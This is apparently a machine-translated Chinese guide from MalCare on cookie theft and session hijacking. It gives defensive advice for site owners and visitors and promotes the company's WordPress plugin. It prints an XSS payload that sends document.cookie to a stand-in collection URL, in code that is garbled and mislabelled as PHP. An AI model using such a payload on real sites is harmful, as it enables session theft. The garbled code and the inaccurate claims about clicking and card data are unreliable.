如何防止 Cookie 窃取和会话劫持？ （最简单的指南）

您知道您的网站使用 cookie 来存储机密数据吗？ 您知道黑客可以轻松窃取您的 cookie 吗？ 这可能会使您的网站和访问者处于危险之中！

Cookie 存储各种信息——从客户的广告偏好到登录凭据和信用卡信息。 Cookie 在互联网上被广泛使用，它们被盗的频率非常高。

如果您是 cookie 窃取或会话劫持的受害者，其后果是严重的。 您不仅会失去收入和访客的信任，而且还可能面临法律问题和巨额罚款！

但不要担心，因为今天，我们将带您了解防止这些攻击所需了解的一切！

在本指南中，我们将首先了解黑客如何窃取 cookie，然后我们将介绍预防措施。

TL;DR ：担心您的 WordPress 网站？ 您现在可以通过安装会话劫持和 Cookie 窃取保护插件来保护您的站点。 它会定期扫描您的网站，并在黑客注入任何恶意代码使他们能够窃取 cookie 时提醒您。 使用该插件，您可以及时清理黑客攻击并避免产生影响。

表中的内容

→ 什么是 Cookie 窃取？

→ 黑客如何使用跨站点脚本 (XSS) 窃取 Cookie 和劫持会话？

→ 如何防止 Cookie 窃取和会话劫持？

→ 网站访问者可以采取的防止 Cookie 窃取的步骤

什么是 Cookie 窃取？

正如我们所希望的那样，偷饼干并不像孩子把手伸进饼干罐那么简单！ 这是一个复杂的过程，要了解正在发生的事情，我们需要触及基础知识。

→ 什么是 Cookie？

您可以将 cookie 视为微小的数据位。 它存储有关您与网站互动的信息。 例如，电子商务网站想要跟踪客户的旅程——搜索的产品、购买的产品、购物车中遗弃的物品，或者他们访问了哪些页面。

这为商店提供了有关客户偏好、哪些页面访问最多、用户在页面上停留多长时间等的分析信息。然后他们可以使用这些信息根据客户的偏好定制网站上显示的内容。

Cookie 使网站所有者能够深入了解哪些有效，哪些无效。 这有助于他们确定需要在其网站上更改或改进的内容。

Cookie 还用于向用户显示相关广告。 当您访问网站时，您会注意到正在显示的广告。

这些广告通常反映您最近的搜索历史。 例如，如果您在 Google 上搜索“笔记本电脑”，您会发现所有网站上的广告都向您展示戴尔的广告。 这些广告不是网站的一部分，而是由 Google Adsense 等服务处理的。

Cookies 为网站所有者和用户提供便利。 它可以提高参与度并带来更多销售，这对网站所有者来说非常有用。 对于买家而言，cookie 可帮助他们在网站上获得更个性化的体验或看到更相关的广告。

但是有很多缺点，我们稍后会讨论。

[返回顶部↑ ]

→ 什么是浏览器会话和会话 ID？

当您登录网站时，您的计算机和该网站之间会创建一个会话。

例如，当您登录 Facebook 时，会话开始。 这允许您继续使用 Facebook（即使您关闭并重新打开网络浏览器），直到您单击“注销”并结束会话。

如果未创建会话，则每次需要新数据时都需要继续登录。 例如，如果您想离开您的 Facebook 新闻提要并查看朋友的个人资料页面，您将退出 Facebook，并且需要再次输入您的凭据才能登录并查看朋友的个人资料。

这就是为什么需要会话的原因。 它使您保持登录状态，以便您可以继续浏览不同的网页并浏览网站。

这里需要特别注意的是，每个会话都会生成一组 cookie。 我们可以称这些会话 cookie。 每个会话 cookie 都有一个唯一的会话 ID。

网站使用此 ID 对用户进行身份验证并建立可信连接。

例如，要登录 Facebook，您需要输入您的用户名和密码。 接下来，创建一个具有唯一 ID 的会话。 您向 Facebook 网站提出的任何请求都将使用此 ID 进行身份验证。 因此，当您想要查看不同的页面时，您将向 Facebook 服务器发送请求以显示该页面。 Facebook 验证 ID 并显示您希望看到的内容。

现在，黑客可以劫持您的会话并滥用此受信任的连接。 他们可以代表您发送恶意请求。 让我们看看如何。

[返回顶部↑ ]

→ Cookie 有哪些安全问题？

生成 cookie 时，它​​们只能由您（网站所有者）查看。 没有其他网站可以查看您的 cookie。 它们只属于你。

但是这些 cookie 在互联网上传播。 它们由广告服务和分析服务使用。 因此，这些 cookie 在全球范围内从一个服务器跳到另一个服务器。 如果连接不安全，黑客可以轻松拦截和窃取这些 cookie。

现在，您可能会认为，如果黑客设法获取有关您的购物偏好的信息，那有什么大不了的，对吧？

问题是 cookie 存储的不仅仅是关于您的购物偏好的信息。 它还存储银行详细信息和个人信息，例如您的送货地址和联系方式。

如果此类信息落入坏人之手，可能会被滥用于欺诈活动。

黑客窃取 cookie 的最常见方式之一是他们是否使用与您相同的 wifi。 这种 wifi 黑客攻击称为中间人攻击，只有当两者都连接到同一无线网络时才会发生。 这就是为什么建议永远不要使用不安全或被许多人使用的公共 wifi 。 这也可能发生在同一计算机网络中的用户身上。

其他一些方法包括数据包嗅探和利用称为跨站点脚本的漏洞。 今天，我们将向您详细介绍 XSS cookie 窃取的工作原理。

[返回顶部↑ ]

黑客如何使用跨站点脚本 (XSS) 窃取 Cookie 和劫持会话？

为了向您展示黑客如何使用跨站点脚本 (XSS) 攻击窃取 cookie，我们将使用一个示例。 假设您访问的网站上有评论部分。

您所做的任何评论都将被发送到网站的数据库。 理想情况下，此评论部分应配置为仅接受纯英语文本。 但是，如果它也接受特殊字符，这会使它容易受到 XSS 攻击。

黑客可以输入他们自己的恶意代码，这些代码将被发送到数据库。 一旦进入，代码将被执行。 黑客可以将大量代码插入网站以运行各种恶意活动，例如创建新的网站管理员或窃取 cookie。

要窃取 cookie，黑客可以输入以下代码：

注意：这不是关于如何窃取 cookie 的教程。 本文旨在让网站所有者了解黑客如何窃取 cookie。 我们不建议您进行任何非法活动。

[php]

文档.write('<img src=& amp;amp;amp;quot;http://localhost/submitcookie.php?cookie ='

+ escape(document.cookie) + '" />）；

[/php]

在评论部分，此代码将显示为图像。 如果您（作为访问者）单击它，您将看到显示的图像。 但不仅仅是发生了。

当您单击图像时，此 PHP 文件会静默执行代码并获取您的会话 cookie 和会话 ID。

现在黑客可以重新创建您的会话并在该网站上冒充您。 他们可以进行多种恶意行为。 例如，如果您的 cookie 包含您的信用卡或任何其他支付信息，他们就可以进行购买。

幸运的是，有一些预防措施可以保护网站所有者及其访问者免受这些黑客攻击。

[ss_click_to_tweet tweet=”切勿点击网站评论部分和电子邮件中的可疑链接。 你可能会成为 cookie 盗窃的受害者。” content=”切勿点击网站评论部分和电子邮件中的可疑链接。 你可能会成为 cookie 盗窃的受害者。” 样式=“默认”]

[返回顶部↑ ]

如何防止 Cookie 窃取和会话劫持？

有两方在防止 cookie 盗窃和会话劫持方面发挥作用——网站所有者和访问者。 我们将讨论双方的预防措施。

→网站所有者可以采取的措施来防止 Cookie 窃取

作为网站所有者，如果没有安全分析师为您处理一切，您需要实施以下预防措施：

1.安装SSL证书

数据在用户的浏览器和您的网络服务器之间不断传输。 如果没有 SSL，此数据（cookie）将以纯文本形式发送。 如果黑客拦截了这些数据，他们可以简单地读取它。 因此，如果它包含登录凭据，它将被公开。

SSL（安全套接字层）将在数据传输之前对其进行加密。 因此，即使黑客设法窃取了它，他们也无法读取数据。

您可以通过网络托管公司或 SSL 提供商获取 SSL 证书。 您还可以从 Let's Encrypt 获得基本的免费 SSL 证书。

2.安装安全插件

在您的网站上保持WordPress 安全插件（例如 MalCare）处于活动状态。 该插件的防火墙将阻止对您网站的黑客攻击并阻止恶意 IP 地址。 此外，它会定期扫描您的网站，并在黑客输入任何恶意代码时提醒您。 您可以立即清理您的网站。 这将帮助您在此类黑客攻击造成任何伤害之前立即检测并删除它们。

3.更新您的网站

始终让您的网站保持最新状态，这包括 WordPress 安装、主题和插件。 在过时的软件上运行会在您的网站上打开许多黑客可以利用的漏洞。 确保在有新更新可用时更新您的站点。

这些更新不仅包含新功能和错误修复，而且还会不时修复安全漏洞。

4. 强化你的网站

WordPress.org 推荐了您应该在您的网站上实施的某些网站强化措施。 这包括使用强而独特的用户名和强密码，阻止在未知文件夹中执行 PHP，在主题和插件中禁用文件编辑器等等。 现在，这对您来说可能听起来像是行话，因此我们创建了一个深入的 WordPress 强化分步指南，您可以按照该指南进行操作。

[返回顶部↑ ]

网站访问者可以采取的防止 Cookie 窃取的步骤

作为网站访问者，您不必盲目相信网站已经采取了适当的安全措施。 您可以使用以下网络安全协议来保护自己。

1.安装有效的防病毒软件

确保您用于访问互联网的设备安装了反恶意软件。 如果在您访问恶意网站时检测到恶意软件，这将提醒您。 它还会删除您可能不小心下载或安装在系统上的任何恶意软件。

2. 永远不要点击可疑链接

黑客通过网站上的评论部分和电子邮件来锁定用户。 避免点击不受信任的链接，尤其是那些以诱人的优惠或折扣吸引您的链接。

3.避免存储敏感数据

在购物网站上存储信用卡信息可以使结帐更加快捷方便。 在 Google Chrome 等网络浏览器上保存密码以自动登录网站，无需记住密码！

但这一切都伴随着被盗的高风险。 最好永远不要在网站上存储敏感数据。 它可能会为您节省几秒钟，但也会让您面临被攻击的风险。

4. 清除 Cookie

您可以定期清除 cookie，以清除存储在 Google Chrome 等浏览器中的任何敏感信息。 访问历史记录 > 清除浏览历史记录。 在这里，勾选“Cookie 和其他站点数据”复选框。

选择时间范围“所有时间”或根据您的喜好选择一个。 接下来，单击“清除数据”，cookie 将从您的浏览器历史记录中删除。

这使我们结束了 cookie 窃取。 我们希望本文能帮助您更好地了解到底发生了什么以及如何预防它。

[ss_click_to_tweet tweet=”这份来自 MalCare 的指南帮助我了解了 cookie 窃取以及如何对其采取预防措施。 一探究竟。” content=”这份来自 MalCare 的指南帮助我了解了 cookie 窃取以及如何对其采取预防措施。 一探究竟。” 样式=“默认”]

[返回顶部↑ ]

最后的想法

作为网站所有者，您需要采取保护措施来保护您自己以及您的访问者、客户和客户的利益。 但我们明白，建立网站并对其进行管理是一项艰巨的任务。

有无数的事情需要处理，这就是为什么 WordPress 安全性往往退居二线的原因。

但是忽视您网站的安全方面可能会对您的所有其他努力造成灾难性的后果。

MalCare 安全插件是一个简单、快速和高效的解决方案。 您可以将其视为您雇用的保安人员。 它将全天候工作以定期扫描您的网站并保护其免受攻击。 您可以放心，您的网站是安全的。

使用MalCare保护您的 WordPress 网站！